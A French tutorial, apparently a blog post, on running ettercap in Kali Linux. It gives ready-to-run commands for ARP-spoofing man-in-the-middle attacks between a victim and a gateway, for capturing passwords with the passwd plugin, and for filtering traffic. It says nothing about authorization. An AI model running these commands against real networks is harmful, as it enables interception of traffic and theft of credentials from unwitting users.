Ettercap sur Kali Linux
Guide Complet sur la Commande Ettercap dans Kali Linux
Dans cet article, nous explorerons en détail la commande ettercap, un outil puissant pour les attaques de type Man-in-the-Middle (MITM). Nous vous fournirons des exemples pratiques et toutes les options disponibles pour vous aider à maîtriser cet outil essentiel dans Kali Linux.
Introduction à Ettercap
Ettercap est un outil complet pour l’interception et l’analyse du trafic réseau. Il est principalement utilisé pour réaliser des attaques de type Man-in-the-Middle (MITM) et permet de capturer des mots de passe, injecter du code malveillant, et bien plus encore.
Installation de Ettercap
Si ettercap n’est pas déjà installé sur votre distribution Kali Linux, vous pouvez l’installer en utilisant la commande suivante :
sudo apt-get install ettercap-graphical
Utilisation de Ettercap
Voici les différentes options et leur utilisation avec des exemples pratiques :
1. Démarrer Ettercap en mode graphique
Pour démarrer ettercap en mode graphique, utilisez la commande suivante :
ettercap -G
- -G: Lance ettercap en mode graphique.
2. Exécuter une attaque MITM ARP Spoofing
Pour lancer une attaque MITM avec ARP Spoofing, utilisez la commande suivante :
ettercap -T -q -i interface -M arp:remote /cible1/ /cible2/
- -T: Mode texte.
- -q: Mode silencieux.
- -i interface: Spécifie l’interface réseau à utiliser.
- -M arp:remote: Spécifie le type d’attaque MITM (ici ARP Spoofing).
- /cible1/: Première cible (par exemple, la victime).
- /cible2/: Deuxième cible (par exemple, la passerelle).
3. Capturer les mots de passe
Pour capturer les mots de passe lors d’une attaque MITM, utilisez la commande suivante :
ettercap -T -q -i interface -M arp:remote /cible1/ /cible2/ -P passwd
- -P passwd: Charge le plugin de capture de mots de passe.
4. Filtrer le trafic réseau
Pour filtrer le trafic réseau et appliquer des règles spécifiques, utilisez la commande suivante :
ettercap -T -q -i interface -F fichier_filtre -M arp:remote /cible1/ /cible2/
- -F fichier_filtre: Spécifie le fichier de filtre à utiliser.
Exemples Pratiques
Exemple 1: Démarrer ettercap en mode graphique
ettercap -G
Cette commande lance ettercap en mode graphique.
Exemple 2: Lancer une attaque MITM ARP Spoofing
ettercap -T -q -i eth0 -M arp:remote /192.168.1.10/ /192.168.1.1/
Cette commande réalise une attaque MITM avec ARP Spoofing entre la cible 192.168.1.10
et la passerelle 192.168.1.1
sur l’interface eth0
.
Exemple 3: Capturer les mots de passe
ettercap -T -q -i eth0 -M arp:remote /192.168.1.10/ /192.168.1.1/ -P passwd
Cette commande capture les mots de passe lors d’une attaque MITM avec ARP Spoofing entre la cible 192.168.1.10
et la passerelle 192.168.1.1
sur l’interface eth0
.
editor's pick
latest video
news via inbox
Nulla turp dis cursus. Integer liberos euismod pretium faucibua